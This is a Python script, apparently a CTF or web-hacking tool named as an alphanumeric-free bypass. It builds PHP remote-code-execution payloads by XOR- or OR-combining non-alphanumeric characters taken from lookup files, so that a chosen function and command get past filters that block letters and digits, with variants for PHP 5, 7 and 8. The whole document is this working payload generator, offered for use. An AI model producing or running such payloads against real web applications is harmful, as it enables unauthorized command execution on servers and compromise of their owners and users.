无字母数字绕过.py
# -*- coding: utf-8 -*-
# author FightnvrGP
def actionxor(arg):
s1 = ""
s2 = ""
for i in arg:
f = open("xor_rce.txt", "r")
while True:
t = f.readline()
if t == "":
break
if t[0] == i:
# print(i)
s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = "(\"" + s1 + "\"^\"" + s2 + "\")"
return (output)
def actionor(arg):
s1 = ""
s2 = ""
for i in arg:
f = open("or_rce.txt", "r")
while True:
t = f.readline()
if t == "":
break
if t[0] == i:
# print(i)
s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = "(\"" + s1 + "\"|\"" + s2 + "\")"
return (output)
print("注意: 请先执行一遍随附的PHP脚本,再执行此脚本")
choose = input("[+] 1.异或\n[+] 2.或\n[+] your choose:")
if choose not in ["1", "2"]:
exit("An option that is not allowed")
chooseVersion = input("[+] 1.PHP 5.*\n[+] 2.PHP 7.*\n[+] 3.PHP 8.*\n[+] your PHP Version:")
if chooseVersion not in ["1", "2", "3"]:
exit("An option that is not allowed")
if choose == "1":
while True:
param = None
par1 = input("\n[+] your function:")
par2 = input("[+] your command:")
if chooseVersion == "1":
param = "$_=" + actionxor(par1)[1:-1] + ";" + "$_" + (actionxor(par2) if par2.__len__() > 0 else "()") + ";"
elif chooseVersion == "2" or chooseVersion == "3":
param = actionxor(par1) + (actionxor(par2) if par2.__len__() > 0 else "()") + ";"
else:
exit("An option that is not allowed")
print("[*] " + param)
elif choose == "2":
while True:
param = None
par1 = input("\n[+] your function:")
par2 = input("[+] your command:")
if chooseVersion == "1":
param = "$_=" + actionor(par1)[1:-1] + ";" + "$_" + (actionor(par2) if par2.__len__() > 0 else "()") + ";"
elif chooseVersion == "2" or chooseVersion == "3":
param = actionor(par1) + (actionor(par2) if par2.__len__() > 0 else "()") + ";"
else:
exit("An option that is not allowed")
print("[*] " + param)
else:
exit("An option that is not allowed")
WEB